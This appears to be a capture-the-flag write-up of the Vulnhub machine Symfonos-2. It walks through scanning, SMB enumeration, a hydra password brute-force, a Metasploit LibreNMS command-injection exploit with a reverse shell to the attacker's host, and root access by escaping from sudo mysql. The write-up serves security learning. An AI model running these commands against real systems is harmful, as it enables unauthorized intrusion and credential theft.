Vulnhub: Symfonos-2
This is the second box in the symfonos series. This series is really well done, and are reminiscent of the boxes on hackthebox, focusing more on exploits than puzzle-y stuff.
Scanning
Finding the box on the network:
crazyeights@es-base:~$ nmap -PS 192.168.56.1-255
Nmap scan report for 192.168.56.133
Host is up (0.00015s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Find specific details about running services (snipped):
crazyeights@es-base:~$ nmap -A -p- 192.168.56.133
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http WebFS httpd 1.21
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
Only real important detail - domain name: symfonos2
Web:
Index Page:
Download image from index page for later (was a dead end)
Enumerating Server:
crazyeights@es-base:~$ dirb http://192.168.56.133
- There is nothing else on the server.
- Moving on to check the shares.
SMB:
List null shares:
crazyeights@es-base:~$ smbclient -L \\symfonos2 -I 192.168.56.133 -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
Connect to the available null share anonymous:
crazyeights@es-base:~$ smbclient \\\\symfonos2\\anonymous -I 192.168.56.133 -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 18 10:30:09 2019
.. D 0 Thu Jul 18 10:29:08 2019
backups D 0 Thu Jul 18 10:25:17 2019
19728000 blocks of size 1024. 16312448 blocks available
smb: \> cd backups
Download the file log.txt:
smb: \backups\> ls
. D 0 Thu Jul 18 10:25:17 2019
.. D 0 Thu Jul 18 10:30:09 2019
log.txt N 11394 Thu Jul 18 10:25:16 2019
19728000 blocks of size 1024. 16312448 blocks available
smb: \backups\> get log.txt
getting file \backups\log.txt of size 11394 as log.txt (741.8 KiloBytes/sec) (average 741.8 KiloBytes/sec)
smb: \backups\>
In log.txt we find a user:
# Set the user and group under which the server will run.
User aeolus
Group aeolus
- Try to get the users credentials
- Thought there was something on FTP, so tried to get the user’s password for FTP:
crazyeights@es-base:~$ hydra -l aeolus -P lists/rockyou.txt ftp://192.168.56.133
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.56.133:21/
[21][ftp] host: 192.168.56.133 login: aeolus password: sergioteamo
1 of 1 target successfully completed, 1 valid password found
crazyeights@es-base:~$
- Nothing extra in ftp
- The found password is the users password for SSH as well
User:
Login as aeolus:
crazyeights@es-base:~$ ssh aeolus@192.168.56.133
The user has nothing interesting in their home folder:
aeolus@symfonos2:~$ ls
share
aeolus@symfonos2:~$
In the log.txt file found earlier there is the following line, if we can find it we can crack user passswords:
root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
Getting shadow.bak from backups:
aeolus@symfonos2:/var$ cd backups/
aeolus@symfonos2:/var/backups$ cat shadow.bak
root:$6$VTftENaZ$ggY84BSFETwhissv0N6mt2VaQN9k6/HzwwmTtVkDtTbCbqofFO8MVW.IcOKIzuI07m36uy9.565qelr/beHer.:18095:0:99999:7:::
[SNIP]
aeolus:$6$dgjUjE.Y$G.dJZCM8.zKmJc9t4iiK9d723/bQ5kE1ux7ucBoAgOsTbaKmp.0iCljaobCntN3nCxsk4DLMy0qTn8ODPlmLG.:18095:0:99999:7:::
cronus:$6$wOmUfiZO$WajhRWpZyuHbjAbtPDQnR3oVQeEKtZtYYElWomv9xZLOhz7ALkHUT2Wp6cFFg1uLCq49SYel5goXroJ0SxU3D/:18095:0:99999:7:::
mysql:!:18095:0:99999:7:::
Debian-snmp:!:18095:0:99999:7:::
librenms:!:18095::::::
Tried to crack the passwords for the users cronus and root, was unsuccessful:
crazyeights@es-base:~$ john --wordlist=lists/rockyou.txt --rules sym2_pass
Noticed this line:
librenms:!:18095::::::
- librenms is a netwoork monitoring system - there might be another webservice running
- Searched for librenms files:
aeolus@symfonos2:~$ find / -name "*librenms*" 2>/dev/null
/var/lib/apache2/site/enabled_by_admin/librenms
/var/lib/mysql/librenms
/opt/librenms
/etc/logrotate.d/librenms
/etc/apache2/sites-available/librenms.conf
/etc/apache2/sites-enabled/librenms.conf
Didn’t have permissions to access most of them, found this file:
aeolus@symfonos2:~$ cat /etc/apache2/sites-available/librenms.conf
<VirtualHost 127.0.0.1:8080>
DocumentRoot /opt/librenms/html/
ServerName localhost
AllowEncodedSlashes NoDecode
<Directory "/opt/librenms/html/">
Require all granted
AllowOverride All
Options FollowSymLinks MultiViews
</Directory>
</VirtualHost>
The service is only available locally we must use SSH tunneling to make it available on our machine:
crazyeights@es-base:~$ ssh -L 9999:localhost:8080 aeolus@192.168.56.133
LibreNMS
LibreNMS has several vulnerabilities, the ones for metasploit seem promising:
crazyeights@es-base:~$ searchsploit librenms
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
LibreNMS - addhost Command Injection (Metaspl | linux/remote/46970.rb
LibreNMS - Collectd Command Injection (Metasp | linux/remote/47375.rb
LibreNMS 1.46 - 'addhost' Remote Code Executi | php/webapps/47044.py
LibreNMS 1.46 - 'search' SQL Injection | multiple/webapps/48453.txt
---------------------------------------------- ---------------------------------
The commnand injection exploit requires credentials, but we can login with aeolus’s credentials (same as SSH):
Trying the metasploit exploit addhost command injection:
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > options
Module options (exploit/linux/http/librenms_addhost_cmd_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD sergioteamo yes Password for LibreNMS
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 9999 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base LibreNMS path
USERNAME aeolus yes User name for LibreNMS
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.56.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux
We must set LHOST to our address for the vbox interface, as the address must be accessible from the target
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > exploit
[*] Started reverse TCP double handler on 192.168.56.1:4444
[*] Successfully logged into LibreNMS. Storing credentials...
[SNIP]
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.133:43528) at 2021-01-02 22:15:10 -0500
id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
We now have user cronus Spawning an interactive shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Check if cronus can run anything with elevated privileges:
cronus@symfonos2:/opt/librenms/html$ sudo -l
sudo -l
Matching Defaults entries for cronus on symfonos2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User cronus may run the following commands on symfonos2:
(root) NOPASSWD: /usr/bin/mysql
We can use the execute parameter to get a shell:
sudo mysql -e '\! /bin/sh'
# id
id
uid=0(root) gid=0(root) groups=0(root)
Root Flag:
# cd /root
cd /root
# ls
ls
proof.txt
# cat proof.txt
cat proof.txt
Congrats on rooting symfonos:2!
[SNIP]
FIN. 🥳